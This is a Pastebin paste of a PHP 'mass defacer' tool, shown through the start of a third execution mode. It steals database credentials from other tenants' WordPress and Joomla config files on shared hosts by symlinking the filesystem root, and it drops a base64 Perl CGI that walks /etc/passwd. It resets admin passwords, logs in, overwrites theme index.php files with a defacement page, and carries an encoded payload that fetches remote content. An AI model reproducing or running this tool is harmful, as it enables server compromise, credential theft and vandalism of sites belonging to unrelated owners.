t3ll0

[PHP] Joomla Wordpress Mass Defacer

Apr 8th, 2013
163
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. ini_set("display_errors", "0");
  4. set_time_limit(0);
  5. @session_start();
  6. $auth_pass = '';
  7.  
  8. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
  9. if(empty($auth_pass) || (isset($_GET['pass']) && (md5($_GET['pass'])==$auth_pass))) {
  10. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  11. } else {
  12. printLogin();
  13. }
  14. }
  15.  
  16. function printLogin() {
  17. echo '<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr>'.($_SERVER['SERVER_SIGNATURE']?$_SERVER['SERVER_SIGNATURE']:'<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>');exit;
  18. }
  19.  
  20. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  21. $ar0=explode($marqueurDebutLien, $text);
  22. $ar1=explode($marqueurFinLien, $ar0[$i]);
  23. return trim($ar1[0]);
  24. }
  25.  
  26. function randomt() {
  27. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  28. srand((double)microtime()*1000000);
  29. $i = 0;
  30. $pass = '';
  31. while ($i <= 7) {
  32. $num = rand() % 33;
  33. $tmp = substr($chars, $num, 1);
  34. $pass = $pass . $tmp;
  35. $i++;
  36. }
  37. return $pass;
  38. }
  39.  
  40. function index_changer_wp($conf, $content) {
  41. $output = '';
  42. $dol = '$';
  43. $go = 0;
  44. $username = entre2v2($conf,"define('DB_USER', '","');");
  45. $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
  46. $dbname = entre2v2($conf,"define('DB_NAME', '","');");
  47. $prefix = entre2v2($conf,$dol."table_prefix = '","'");
  48. $host = entre2v2($conf,"define('DB_HOST', '","');");
  49.  
  50. $link=mysql_connect($host,$username,$password);
  51. if($link) {
  52. mysql_select_db($dbname,$link) ;
  53. $dol = '$';
  54. $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '".$dol."P".$dol."BpAdo5GPHYYw778chUGOokkzTPnOSP.' WHERE `ID` = 1");
  55. } else {
  56. $output.= "[-] DB Error<br />";
  57. }
  58. if($req1) {
  59.  
  60. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
  61. $data = mysql_fetch_array($req);
  62. $site_url=$data["option_value"];
  63.  
  64. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
  65. $data = mysql_fetch_array($req);
  66. $template = $data["option_value"];
  67.  
  68. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
  69. $data = mysql_fetch_array($req);
  70. $current_theme = $data["option_value"];
  71.  
  72. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  73. $url2=$site_url."/wp-login.php";
  74.  
  75. $ch = curl_init();
  76. curl_setopt($ch, CURLOPT_URL, $url2);
  77. curl_setopt($ch, CURLOPT_POST, 1);
  78. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=ahscr3w&rememberme=forever&wp-submit=Log In&testcookie=1");
  79. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  80. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  81. curl_setopt($ch, CURLOPT_HEADER, 0);
  82. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  83. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  84. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  85. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  86. $buffer = curl_exec($ch);
  87.  
  88. $pos = strpos($buffer,"action=logout");
  89. if($pos === false) {
  90. $output.= "[-] Login Error<br />";
  91. } else {
  92. $output.= "[+] Login Successful<br />";
  93. $go = 1;
  94. }
  95. if($go) {
  96. $cond = 0;
  97. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
  98. curl_setopt($ch, CURLOPT_URL, $url2);
  99. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  100. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  101. curl_setopt($ch, CURLOPT_HEADER, 0);
  102. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  103. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  104. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  105. $buffer0 = curl_exec($ch);
  106.  
  107. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  108. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  109.  
  110. if(substr_count($_file,"/index.php") != 0){
  111. $output.= "[+] index.php loaded in Theme Editor<br />";
  112. $url2=$site_url."/wp-admin/theme-editor.php";
  113. curl_setopt($ch, CURLOPT_URL, $url2);
  114. curl_setopt($ch, CURLOPT_POST, 1);
  115. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  116. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  117. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  118. curl_setopt($ch, CURLOPT_HEADER, 0);
  119. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  120. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  121. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  122. $buffer = curl_exec($ch);
  123. curl_close($ch);
  124.  
  125. $pos = strpos($buffer,'<div id="message" class="updated">');
  126. if($pos === false) {
  127. $output.= "[-] Updating Index.php Error<br />";
  128. } else {
  129. $output.= "[+] Index.php Updated Successfuly<br />";
  130. $hk = explode('public_html',$_file);
  131. $output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
  132. $cond = 1;
  133. }
  134. } else {
  135. $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
  136. curl_setopt($ch, CURLOPT_URL, $url2);
  137. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  138. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  139. curl_setopt($ch, CURLOPT_HEADER, 0);
  140. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  141. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  142. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  143. $buffer0 = curl_exec($ch);
  144.  
  145. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  146. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  147.  
  148. if(substr_count($_file,"index.php") != 0){
  149. $output.= "[+] index.php loaded in Theme Editor<br />";
  150. $url2=$site_url."/wp-admin/theme-editor.php";
  151. curl_setopt($ch, CURLOPT_URL, $url2);
  152. curl_setopt($ch, CURLOPT_POST, 1);
  153. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
  154. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  155. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  156. curl_setopt($ch, CURLOPT_HEADER, 0);
  157. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  158. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  159. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  160. $buffer = curl_exec($ch);
  161. curl_close($ch);
  162.  
  163. $pos = strpos($buffer,'<div id="message" class="updated">');
  164. if($pos === false) {
  165. $output.= "[-] Updating Index.php Error<br />";
  166. } else {
  167. $output.= "[+] Index.php Template Updated Successfuly<br />";
  168. $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
  169. $cond = 1;
  170. }
  171. } else {
  172. $output.= "[-] index.php can not load in Theme Editor<br />";
  173. }
  174. }
  175. }
  176. } else {
  177. $output.= "[-] DB Error<br />";
  178. }
  179. global $base_path;
  180. unlink($base_path.'COOKIE.txt');
  181. return array('cond'=>$cond, 'output'=>$output);
  182. }
  183.  
  184. function index_changer_joomla($conf, $content, $domain) {
  185. $doler = '$';
  186. $username = entre2v2($conf, $doler."user = '", "';");
  187. $password = entre2v2($conf, $doler."password = '", "';");
  188. $dbname = entre2v2($conf, $doler."db = '", "';");
  189. $prefix = entre2v2($conf, $doler."dbprefix = '", "';");
  190. $host = entre2v2($conf, $doler."host = '","';");
  191. $co=randomt();
  192. $site_url = "http://".$domain."/administrator";
  193. $output = '';
  194. $cond = 0;
  195. $link=mysql_connect($host, $username, $password);
  196. if($link) {
  197. mysql_select_db($dbname,$link) ;
  198. $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '9a40044dd4e66fe4fd87b54ed49a0a87:sz4LLlQEZ9Jt43N27JT0qVvptaY53imJ', `usertype` = 'Super Administrator', `block` = 0");
  199. $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
  200. } else {
  201. $output.= "[-] DB Error<br />";
  202. }
  203.  
  204. if($req1){
  205. if ($req) {
  206. $req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
  207. $data = mysql_fetch_array($req);
  208. $template_name = $data["template"];
  209.  
  210. $req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
  211. $data = mysql_fetch_array($req);
  212. $template_id = $data["extension_id"];
  213.  
  214. $url2=$site_url."/index.php";
  215. $ch = curl_init();
  216. curl_setopt($ch, CURLOPT_URL, $url2);
  217. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  218. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  219. curl_setopt($ch, CURLOPT_HEADER, 0);
  220. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  221. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  222. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  223. $buffer = curl_exec($ch);
  224. $return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
  225. $hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
  226.  
  227. if($return && $hidden) {
  228. curl_setopt($ch, CURLOPT_URL, $url2);
  229. curl_setopt($ch, CURLOPT_POST, 1);
  230. curl_setopt($ch, CURLOPT_REFERER, $url2);
  231. curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=3xp1r3_CA123&option=com_login&task=login&return=".$return."&".$hidden."=1");
  232. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  233. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  234. curl_setopt($ch, CURLOPT_HEADER, 0);
  235. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  236. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  237. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  238. $buffer = curl_exec($ch);
  239. $pos = strpos($buffer,"com_config");
  240. if($pos === false) {
  241. $output.= "[-] Login Error<br />";
  242. } else {
  243. $output.= "[+] Login Successful<br />";
  244. }
  245. }
  246. if($pos){
  247. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  248. $ch = curl_init();
  249. curl_setopt($ch, CURLOPT_URL, $url2);
  250. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  251. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  252. curl_setopt($ch, CURLOPT_HEADER, 0);
  253. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  254. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  255. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  256. $buffer = curl_exec($ch);
  257.  
  258. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
  259. if($hidden2) {
  260. $output.= "[+] index.php file found in Theme Editor<br />";
  261. } else {
  262. $output.= "[-] index.php Not found in Theme Editor<br />";
  263. }
  264. }
  265. if($hidden2) {
  266. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  267. $ch = curl_init();
  268. curl_setopt($ch, CURLOPT_URL, $url2);
  269. curl_setopt($ch, CURLOPT_POST, 1);
  270. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
  271. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  272. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  273. curl_setopt($ch, CURLOPT_HEADER, 0);
  274. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  275. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  276. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  277. $buffer = curl_exec($ch);
  278. curl_close($ch);
  279.  
  280. $pos = strpos($buffer,'<dd class="message message">');
  281. $cond = 0;
  282. if($pos === false) {
  283. $output.= "[-] Updating Index.php Error<br />";
  284.  
  285. } else {
  286. $output.= "[+] Index.php Template successfully saved<br />";
  287. $cond = 1;
  288. }
  289. }
  290. }
  291. else {
  292. $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
  293. $data = mysql_fetch_array($req);
  294. $template_name=$data["template"];
  295. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  296. $url2=$site_url."/index.php";
  297. $ch = curl_init();
  298. curl_setopt($ch, CURLOPT_URL, $url2);
  299. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  300. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  301. curl_setopt($ch, CURLOPT_HEADER, 0);
  302. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  303. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  304. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  305. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  306. $buffer = curl_exec($ch);
  307. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
  308.  
  309. if($hidden) {
  310. curl_setopt($ch, CURLOPT_URL, $url2);
  311. curl_setopt($ch, CURLOPT_POST, 1);
  312. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
  313. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  314. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  315. curl_setopt($ch, CURLOPT_HEADER, 0);
  316. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  317. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  318. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  319. $buffer = curl_exec($ch);
  320. $pos = strpos($buffer,"com_config");
  321. if($pos === false) {
  322. $output.= "[-] Login Error<br />";
  323. } else {
  324. $output.= "[+] Login Successful<br />";
  325. }
  326. }
  327.  
  328. if($pos) {
  329. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
  330. curl_setopt($ch, CURLOPT_URL, $url2);
  331. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  332. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  333. curl_setopt($ch, CURLOPT_HEADER, 0);
  334. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  335. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  336. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  337. $buffer = curl_exec($ch);
  338. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
  339. if($hidden2) {
  340. $output.= "[+] index.php file founded in Theme Editor<br />";
  341. } else {
  342. $output.= "[-] index.php Not found in Theme Editor<br />";
  343. }
  344. }
  345.  
  346. if($hidden2) {
  347. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  348. curl_setopt($ch, CURLOPT_URL, $url2);
  349. curl_setopt($ch, CURLOPT_POST, 1);
  350. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
  351. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  352. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  353. curl_setopt($ch, CURLOPT_HEADER, 0);
  354. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  355. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  356. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  357. $buffer = curl_exec($ch);
  358. curl_close($ch);
  359.  
  360. $pos = strpos($buffer,'<dd class="message message fade">');
  361. $cond = 0;
  362. if($pos === false) {
  363. $output.= "[-] Updating Index.php Error<br />";
  364. } else {
  365. $output.= "[+] Index.php Template successfully saved<br />";
  366. $cond = 1;
  367. }
  368. }
  369. }
  370. } else {
  371. $output.= "[-] DB Error<br />";
  372. }
  373. global $base_path;
  374. unlink($base_path.$co);
  375. return array('cond'=>$cond, 'output'=>$output);
  376. }
  377.  
  378. function exec_mode_1($def_url) {
  379.  
  380. @mkdir('sym',0777);
  381. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  382. $fp = @fopen ('sym/.htaccess','w');
  383. fwrite($fp, $wr);
  384. @symlink('/','sym/root');
  385. $dominios = @file_get_contents("/etc/named.conf");
  386. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  387. $out[1] = array_unique($out[1]);
  388. $numero_dominios = count($out[1]);
  389. echo "Total domains: $numero_dominios <br><br />";
  390. $def = file_get_contents($def_url);
  391. $def = urlencode($def);
  392. $def2 = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2RsLmRyb3Bib3guY29tL3UvNzEwMTY1ODMvaW5kZXgudHh0Jyk7DQokcCA9IGV4cGxvZGUoJ3B1YmxpY19odG1sJyxkaXJuYW1lKF9fRklMRV9fKSk7DQokcCA9ICRwWzBdLidwdWJsaWNfaHRtbCc7DQppZiAoJGhhbmRsZSA9IG9wZW5kaXIoJHApKSB7DQogICAgJGZwMSA9IEBmb3BlbigkcC4nL2luZGV4Lmh0bWwnLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgJGZwMSA9IEBmb3BlbigkcC4nL2luZGV4LnBocCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgIGVjaG8gJ0RvbmUnOw0KfQ0KY2xvc2VkaXIoJGhhbmRsZSk7DQp1bmxpbmsoX19GSUxFX18pOw0KPz4=';
  393. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
  394. $output = fopen('defaced.html', 'a+');
  395. $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
  396. $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
  397. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  398. $j = 1;
  399. $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
  400. for($i = $st; $i <= $numero_dominios; $i++)
  401. {
  402. $domain = $out[1][$i];
  403. $dono_arquivo = @fileowner("/etc/valiases/".$domain);
  404. $infos = @posix_getpwuid($dono_arquivo);
  405.  
  406. if($infos['name']!='root') {
  407. $config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
  408. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
  409. $config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
  410.  
  411. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  412.  
  413. if($config01 && preg_match('/dbprefix/i',$config01)){
  414. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  415. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  416. $res = index_changer_joomla($config01, $def, $domain);
  417. echo '<td>'.$res['output'].'</td>';
  418. if($res['cond']) {
  419. echo '<td align="center"><span class="green">DEFACED</span></td>';
  420. fwrite($output, 'http://'.$domain."<br>");
  421. $_SESSION['count1'] = $_SESSION['count1'] + 1;
  422. } else {
  423. echo '<td align="center"><span class="red">FAILED</span></td>';
  424. }
  425. echo '</tr>';
  426. }
  427.  
  428. if($config02 && preg_match('/DB_NAME/i',$config02)){
  429. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  430. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  431. $res = index_changer_wp($config02, $def2);
  432. echo '<td>'.$res['output'].'</td>';
  433. if($res['cond']) {
  434. echo '<td align="center"><span class="green">DEFACED</span></td>';
  435. fwrite($output, 'http://'.$domain."<br>");
  436. $_SESSION['count2'] = $_SESSION['count2'] + 1;
  437. } else {
  438. echo '<td align="center"><span class="red">FAILED</span></td>';
  439. }
  440. echo '</tr>';
  441. }
  442. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  443. if($config03 && preg_match('/DB_NAME/i',$config03)){
  444. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  445. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  446. $res = index_changer_wp($config03, $def2);
  447. echo '<td>'.$res['output'].'</td>';
  448. if($res['cond']) {
  449. echo '<td align="center"><span class="green">DEFACED</span></td>';
  450. fwrite($output, 'http://'.$domain."<br>");
  451. $_SESSION['count2'] = $_SESSION['count2'] + 1;
  452. } else {
  453. echo '<td align="center"><span class="red">FAILED</span></td>';
  454. }
  455. echo '</tr>';
  456. }
  457. }
  458. }
  459. echo '</table>';
  460. echo '<hr/>';
  461. echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
  462. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  463. if($_SESSION['count1']+$_SESSION['count2'] > 0){
  464. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
  465. }
  466. }
  467.  
  468. function exec_mode_2($def_url) {
  469.  
  470. $domains = @file_get_contents("/etc/named.conf");
  471. @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
  472. $out = array_unique($out[1]);
  473. $num = count($out);
  474. print("Total domains: $num<br><br />");
  475.  
  476. $def = file_get_contents($def_url);
  477. $def = urlencode($def);
  478.  
  479. $output = fopen('defaced.html', 'a+');
  480. $defaced = '';
  481. $count1 = 0;
  482. $count2 = 0;
  483. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  484. $j = 1;
  485. $map = array();
  486. foreach($out as $d) {
  487. $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
  488. $map[$info['name']] = $d;
  489. }
  490. $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
  491. NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
  492. h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
  493. G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
  494. YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
  495. kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
  496. B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
  497. mkdir('plsym',0777);
  498. file_put_contents('plsym/plsym.cc', base64_decode($dt));
  499. chmod('plsym/plsym.cc', 0755);
  500. $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
  501. $fp = @fopen ('plsym/.htaccess','w');
  502. fwrite($fp, $wr);
  503. fclose($fp);
  504. $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
  505.  
  506. $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
  507. unlink('plsym/plsym.cc');
  508. $data = file_get_contents($url);
  509. preg_match_all('/<a href="(.+)">/', $data, $match);
  510. unset($match[1][0]);
  511. $i = 1;
  512. foreach($match[1] as $m)
  513. {
  514. $mz = explode('##',urldecode($m));
  515. $config01 = '';
  516. $config02 = '';
  517. if($mz[1] == 'joomla.txt') {
  518. $config01 = file_get_contents($url.$m);
  519. }
  520. if($mz[1] == 'wordpress.txt') {
  521. $config02 = file_get_contents($url.$m);
  522. }
  523. $domain = $map[$mz[0]];
  524. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  525.  
  526. if($config01 && preg_match('/dbprefix/i',$config01)){
  527. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  528. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  529. $res = index_changer_joomla($config01, $def, $domain);
  530. echo '<td>'.$res['output'].'</td>';
  531. if($res['cond']) {
  532. echo '<td align="center"><span class="green">DEFACED</span></td>';
  533. fwrite($output, 'http://'.$domain."<br>");
  534. $count1++;
  535. } else {
  536. echo '<td align="center"><span class="red">FAILED</span></td>';
  537. }
  538. echo '</tr>';
  539. }
  540.  
  541. if($config02 && preg_match('/DB_NAME/i',$config02)){
  542. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  543. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  544. $res = index_changer_wp($config02, $def);
  545. echo '<td>'.$res['output'].'</td>';
  546. if($res['cond']) {
  547. echo '<td align="center"><span class="green">DEFACED</span></td>';
  548. fwrite($output, 'http://'.$domain."<br>");
  549. $count2++;
  550. } else {
  551. echo '<td align="center"><span class="red">FAILED</span></td>';
  552. }
  553. echo '</tr>';
  554. }
  555. }
  556. echo '</table>';
  557. echo '<hr/>';
  558. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
  559. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  560. if($count1+$count2 > 0){
  561. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
  562. }
  563. }
  564.  
  565. function exec_mode_3($def_url) {
  566.  
  567. $domains = @file_get_contents("/etc/named.conf");
  568. @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
  569. $out = array_unique($out[1]);
  570. $num = count($out);
  571. print("Total domains: $num<br><br />");
  572.  
  573. $def = file_get_contents($def_url);
  574. $def = urlencode($def);
  575.  
  576. $output = fopen('defaced.html', 'a+');
  577. $defaced = '';
  578. $count1 = 0;
  579. $count2 = 0;
  580. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  581. $j = 1;
  582. $map = array();
  583. foreach($out as $d) {
  584. $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
  585. $map[$info['name']] = $d;
  586. }
